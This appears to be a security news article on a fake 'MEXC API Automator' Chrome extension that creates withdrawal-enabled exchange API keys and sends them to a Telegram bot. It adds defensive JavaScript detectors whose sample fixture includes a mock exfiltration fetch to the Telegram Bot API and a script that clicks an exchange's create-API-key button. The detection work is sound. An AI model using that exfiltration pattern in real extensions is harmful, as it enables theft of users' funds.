SHOCKING CHROME EXTENSION EXPOSED: How “MEXC API Automator” Secretly Drains Crypto Accounts

A newly discovered malicious Chrome extension is sending shockwaves through the crypto community.

Named MEXC API Automator, this browser add-on pretends to help traders automate their activities. In reality, it quietly creates API keys with withdrawal permission enabled and sends the key and secret to a Telegram bot controlled by the attackers. The result is full account takeover and stolen funds.

The extension presents itself as an official MEXC API tool. It is an impersonation and has no affiliation with MEXC in any way.

This threat was first reported by Cybersecurity News Everyday (@TweetThreatNews) and traced back to research published on hendryadrian.com. While the extension targets users of the MEXC crypto exchange, its implications extend far beyond one platform. It highlights how browser extensions, often trusted and overlooked, can become dangerous attack vectors when abused by cybercriminals.

the Original

The article reveals a malicious Chrome extension called MEXC API Automator that targets cryptocurrency traders using the MEXC exchange. The extension disguises itself as a legitimate automation tool, luring victims who want to simplify their trading. Once installed, it asks for broad browser permissions over the exchange's pages and, acting inside the victim's logged-in session, creates API keys with withdrawal rights.

What makes this attack especially dangerous is the stealthy behavior of the extension. It hides its true permissions from users, giving the illusion of safety. Behind the scenes, it automatically generates API keys and transmits them to a Telegram bot controlled by attackers. This gives cybercriminals remote access to victims’ trading accounts.
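A static triage of an unpacked extension catches exactly the combination described above: host access to the exchange's pages plus a hard-coded Telegram Bot API endpoint or token. The following is an added example written for this article, not code from the extension, from MEXC or from the cited research; the manifest, script text, exchange domain and token value are constructed, and only the Bot API host and the shape of a bot token are real.

```javascript
// Added example: static triage of an unpacked Chrome extension.
// Everything below (manifest, scripts, domain, token) is constructed sample data.

// Telegram Bot API tokens look like "<bot id>:<35 chars of [A-Za-z0-9_-]>".
const TELEGRAM_TOKEN_RE = /\b\d{8,10}:[A-Za-z0-9_-]{35}\b/;
const TELEGRAM_API_RE = /api\.telegram\.org\/bot/;
// Browser permissions that let an extension read or drive an authenticated session.
const SENSITIVE_PERMISSIONS = new Set(['cookies', 'webRequest', 'scripting', 'tabs', 'debugger']);

// Does a Chrome match pattern ("https://*.example.com/*", "<all_urls>") cover host?
function patternCoversHost(pattern, host) {
  if (pattern === '<all_urls>') return true;
  const m = /^(\*|https?|wss?|file|ftp):\/\/([^/]*)\//.exec(pattern);
  if (!m) return false;
  const h = m[2];
  if (h === '*') return true;
  if (h.startsWith('*.')) {
    const suffix = h.slice(2);
    return host === suffix || host.endsWith('.' + suffix);
  }
  return host === h;
}

// manifest: parsed manifest.json; scripts: { filename: source text };
// watchedHosts: exchange hostnames whose sessions we care about.
function auditExtension(manifest, scripts, watchedHosts) {
  const findings = [];
  const patterns = [
    ...(manifest.host_permissions || []),
    ...(manifest.content_scripts || []).flatMap((cs) => cs.matches || []),
    // Manifest V2 extensions list host patterns under "permissions".
    ...(manifest.permissions || []).filter((p) => p.includes('://') || p === '<all_urls>'),
  ];
  for (const host of watchedHosts) {
    const hit = patterns.find((p) => patternCoversHost(p, host));
    if (hit) findings.push({ id: 'watched-host-access', detail: `${host} via ${hit}` });
  }
  for (const p of manifest.permissions || []) {
    if (SENSITIVE_PERMISSIONS.has(p)) findings.push({ id: 'sensitive-permission', detail: p });
  }
  for (const [file, src] of Object.entries(scripts)) {
    if (TELEGRAM_API_RE.test(src)) findings.push({ id: 'telegram-bot-api', detail: file });
    const tok = TELEGRAM_TOKEN_RE.exec(src);
    if (tok) {
      // Redact: report the bot id only, never copy the secret half into a ticket.
      findings.push({ id: 'hardcoded-telegram-token', detail: `${file}: bot ${tok[0].split(':')[0]}:<redacted>` });
    }
  }
  const ids = new Set(findings.map((f) => f.id));
  const exfil = ids.has('telegram-bot-api') || ids.has('hardcoded-telegram-token');
  const sessionAccess = ids.has('watched-host-access');
  const risk = sessionAccess && exfil ? 'high' : sessionAccess || exfil ? 'medium' : 'low';
  return { risk, findings };
}

// Constructed sample: a "trading helper" that reaches into the exchange site
// and posts to a bot. The domain and token are invented for this example.
const sampleManifest = {
  manifest_version: 3,
  name: 'Trading Helper (constructed sample)',
  permissions: ['storage', 'cookies', 'scripting'],
  host_permissions: ['https://*.example-exchange.test/*'],
  content_scripts: [{ matches: ['https://www.example-exchange.test/*'], js: ['inject.js'] }],
};
const sampleScripts = {
  'background.js': `
    const T = '1234567890:ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghi';
    fetch('https://api.telegram.org/bot' + T + '/sendMessage', { method: 'POST' });
  `,
  'inject.js': `document.querySelector('#create-api-key').click();`,
};

function demoAudit() {
  return auditExtension(sampleManifest, sampleScripts, ['www.example-exchange.test']);
}

console.log(JSON.stringify(demoAudit(), null, 2));
```

Run it against the unpacked extension directory by loading `manifest.json` and each script file into the two arguments. A "high" result is a reason to uninstall and to revoke every API key on the exchange account, not merely a reason to investigate further.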

With these stolen credentials, attackers can perform unauthorized actions, including withdrawing funds, executing trades, and fully taking over accounts. Victims often remain unaware until their funds disappear. A request signed with an API key and secret is authenticated by that signature alone; it never passes through the interactive login, so the two-factor prompt that guards the login is never triggered. A key with withdrawal permission is therefore a standing backdoor into the account.

The report also highlights how Telegram is increasingly used as a command-and-control and exfiltration channel by cybercriminals. The Bot API is a plain HTTPS endpoint on a well-known domain, costs the attacker no infrastructure, and is trivial to automate, so stolen data blends into ordinary web traffic. Attackers use bots to collect data, manage victims, and coordinate theft operations.

Security researchers warn that this campaign may be part of a broader trend where fake trading tools and browser extensions are weaponized. Users are advised to carefully review permissions, avoid unofficial extensions, and rotate API keys regularly. The article concludes by stressing the urgent need for better extension monitoring by browser vendors and stronger security awareness among crypto users.

What Undercode Says:

This incident exposes a critical weakness in how users perceive browser security. Most people treat Chrome extensions as harmless utilities, but in reality they operate with deep access to the browser and to sensitive data. Once an extension is granted permission, it becomes extremely difficult to monitor what it does in the background, and a later update from the Web Store can change its behaviour without any new prompt as long as it asks for no additional permissions.

The MEXC API Automator attack is particularly sophisticated because it exploits trust in automation tools. Crypto traders often rely on bots and scripts to execute trades faster than humans can. Attackers understand this behavior and craft malicious tools that blend perfectly into legitimate trading workflows.

The use of API keys with withdrawal permissions is the most alarming aspect. Many traders enable full access for convenience, unaware that this hands over complete control of their funds. API keys should be restricted to read-only or trade-only access, withdrawal permission should never be granted to a key handed to a third-party tool, and keys should be bound to an IP allowlist where the exchange supports it, so that a leaked key is useless from the attacker's machine.

Telegram's role in this campaign is also telling. The platform has become a favorite among cybercriminals because bots are free, effortless to script, and subject to little moderation. The same pattern appears in ransomware operations, phishing campaigns, and credential-harvesting schemes.
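On the defender's side, the Bot API is also easy to spot: every call goes to api.telegram.org with the bot token in the URL path, and end-user workstations rarely have a legitimate reason to talk to that host (the Telegram apps themselves do not use it). The block below is an added example, not from the article or the research it cites, that flags such traffic in web-proxy logs. The log format and the lines themselves are constructed; the host and the `/bot<token>/<method>` URL shape are real.

```javascript
// Added example: flag Telegram Bot API calls in web-proxy logs.
// Log format and log lines are constructed for this example.

// Path shape: /bot<id>:<token>/<method>  or  /file/bot<id>:<token>/<path>
const BOT_PATH_RE = /^\/(file\/)?bot(\d{8,10}):([A-Za-z0-9_-]{35})(?:\/([A-Za-z]+))?/;

// Constructed line format: "<iso time> <client ip> <method> <url> <status>"
function parseProxyLine(line) {
  const [ts, clientIp, method, url, status] = line.trim().split(/\s+/);
  if (!url) return null;
  let u;
  try { u = new URL(url); } catch { return null; }
  return { ts, clientIp, method, host: u.hostname, path: u.pathname, status: Number(status) };
}

// Returns one alert per Bot API call plus a per-client count. The token is
// deliberately not copied into the alert; only the bot id is kept.
function detectTelegramBotApi(lines) {
  const alerts = [];
  const byClient = new Map();
  for (const line of lines) {
    const rec = parseProxyLine(line);
    if (!rec || rec.host !== 'api.telegram.org') continue;
    const m = BOT_PATH_RE.exec(rec.path);
    if (!m) continue;
    const [, isFile, botId, , apiMethod] = m;
    alerts.push({
      ts: rec.ts,
      clientIp: rec.clientIp,
      botId,
      apiMethod: isFile ? 'file-download' : (apiMethod || 'unknown'),
      status: rec.status,
    });
    byClient.set(rec.clientIp, (byClient.get(rec.clientIp) || 0) + 1);
  }
  return { alerts, byClient: Object.fromEntries(byClient) };
}

// Constructed sample: one workstation exfiltrating via a bot, one user on the
// Telegram web client (which is not the Bot API and must not be flagged).
const sampleLogLines = [
  '2025-03-01T09:12:01Z 10.0.0.5 POST https://api.telegram.org/bot1234567890:ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghi/sendMessage 200',
  '2025-03-01T09:12:03Z 10.0.0.5 GET https://www.example-exchange.test/account/api 200',
  '2025-03-01T09:13:10Z 10.0.0.7 GET https://web.telegram.org/ 200',
  '2025-03-01T09:14:00Z 10.0.0.5 POST https://api.telegram.org/bot1234567890:ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghi/sendDocument 200',
  '2025-03-01T09:15:30Z 10.0.0.5 GET https://api.telegram.org/file/bot1234567890:ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghi/documents/file_1.txt 200',
  'garbage line that does not parse',
];

function demoDetect() {
  return detectTelegramBotApi(sampleLogLines);
}

console.log(JSON.stringify(demoDetect(), null, 2));
```

The bot id in the alert is enough to pivot on (every message the attacker receives comes from the same bot), and a `sendDocument` or `sendMessage` from a client that also browses an exchange's API-key page is the sequence to escalate first. If the proxy logs full URLs, treat the log itself as sensitive: the token in it is a live credential for the attacker's bot.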

From a broader cybersecurity perspective, this attack highlights the growing danger of supply-chain-style threats. Users didn’t get hacked through phishing emails or fake websites—they willingly installed a tool they believed was safe. This makes detection and prevention much harder.

Chrome Web Store moderation is another concern. Malicious extensions continue to bypass Google’s screening processes, sometimes staying live for weeks or months before being removed. By that time, hundreds or even thousands of victims may already be compromised.

Crypto exchanges also share responsibility. Platforms like MEXC must improve how API keys are managed, monitored, and revoked: a step-up confirmation when withdrawal permission is granted to a key, IP allowlisting by default, and automated alerts when a freshly created key is used to withdraw to an address the account has never used before. Alerts for suspicious withdrawals and abnormal trading patterns could significantly reduce losses.
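The exchange-side rule that matters most for this campaign is a correlation, not a single event: a withdrawal requested through an API key that was created minutes earlier, without an IP allowlist, to an address the account has never paid before. The following is an added example, not MEXC's code or any exchange's real rule set; the event types, field names, thresholds and the events themselves are constructed for illustration.

```javascript
// Added example: correlate API-key lifecycle events with withdrawals.
// Event shapes, field names, thresholds and sample events are all constructed.
const HOUR_MS = 60 * 60 * 1000;
const DAY_MS = 24 * HOUR_MS;

// events: array of { t: epoch ms, type, account, ... }. Returns alerts for
// withdrawal requests that trip at least two independent signals.
function detectSuspiciousApiWithdrawals(events, { windowMs = 24 * HOUR_MS, minReasons = 2 } = {}) {
  const sorted = [...events].sort((a, b) => a.t - b.t);
  const keys = new Map();           // apiKey -> creation event
  const knownAddresses = new Map(); // account -> Set of addresses withdrawn to before
  const alerts = [];
  let checked = 0;
  for (const ev of sorted) {
    if (ev.type === 'api_key.created') { keys.set(ev.apiKey, ev); continue; }
    if (ev.type === 'withdrawal.completed') {
      // Only completed (i.e. confirmed) withdrawals teach the model an address.
      if (!knownAddresses.has(ev.account)) knownAddresses.set(ev.account, new Set());
      knownAddresses.get(ev.account).add(ev.address);
      continue;
    }
    if (ev.type !== 'withdrawal.requested') continue;
    checked += 1;
    const reasons = [];
    const key = ev.apiKey ? keys.get(ev.apiKey) : null;
    if (key) {
      if (ev.t - key.t < windowMs) reasons.push('withdrawal-via-recently-created-api-key');
      if (!key.ipAllowlist || key.ipAllowlist.length === 0) reasons.push('api-key-has-no-ip-allowlist');
    }
    const seen = knownAddresses.get(ev.account) || new Set();
    if (!seen.has(ev.address)) reasons.push('destination-address-never-used');
    if (reasons.length >= minReasons) {
      alerts.push({ account: ev.account, apiKey: ev.apiKey || null, amount: ev.amount, reasons, action: 'hold-for-manual-confirmation' });
    }
  }
  return { checked, alerts };
}

// Constructed sample: account u1 is the victim pattern from the article,
// account u2 is an ordinary user withdrawing from the web UI to a known address.
const base = 1700000000000;
const sampleEvents = [
  { t: base - 10 * DAY_MS, type: 'withdrawal.completed', account: 'u1', address: 'addr-old' },
  { t: base, type: 'api_key.created', account: 'u1', apiKey: 'k1', permissions: ['read', 'trade', 'withdraw'], ipAllowlist: [] },
  { t: base + 12 * 60 * 1000, type: 'withdrawal.requested', account: 'u1', apiKey: 'k1', address: 'addr-new', amount: 4.2 },
  { t: base - 3 * DAY_MS, type: 'api_key.created', account: 'u2', apiKey: 'k2', permissions: ['read', 'trade'], ipAllowlist: ['203.0.113.5'] },
  { t: base - 20 * DAY_MS, type: 'withdrawal.completed', account: 'u2', address: 'addr-u2' },
  { t: base + HOUR_MS, type: 'withdrawal.requested', account: 'u2', address: 'addr-u2', amount: 0.1 },
];

function demoCorrelate() {
  return detectSuspiciousApiWithdrawals(sampleEvents);
}

console.log(JSON.stringify(demoCorrelate(), null, 2));
```

Holding the request for an out-of-band confirmation (email or app approval) is what turns the detection into prevention: the attacker holds the API key but not the victim's mailbox or phone, so the hold is exactly the second factor the API path otherwise lacks.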

This incident should serve as a wake-up call. The crypto ecosystem is maturing, but security awareness is still lagging. Traders focus heavily on market analysis but often ignore operational security, which ends up costing them far more than bad trades ever could.

Long-term, we expect more malware campaigns disguised as productivity tools. Attackers are shifting from noisy phishing scams to stealthy, long-term access strategies. Browser extensions, desktop trading bots, and fake portfolio trackers will likely become prime attack surfaces.

In short, the MEXC API Automator case is not just about one extension. It reflects a broader evolution in cybercrime, where attackers exploit trust, automation, and convenience to achieve devastating financial results.

Fact Checker Results

The extension MEXC API Automator is confirmed to create API keys with withdrawal permissions.

Credentials are verified to be sent to a Telegram bot controlled by attackers.

The threat was publicly reported by Cybersecurity News Everyday and security researchers.

Prediction

If current trends continue, we expect a surge in fake trading tools and malicious extensions targeting crypto investors in 2026. Cybercriminals will increasingly focus on API abuse rather than traditional phishing, as it provides deeper and longer-lasting access to victim accounts. Exchanges and browser vendors will be forced to tighten security policies, but attackers will likely stay one step ahead, making this an ongoing cyber arms race.

References:

Reported By: x.com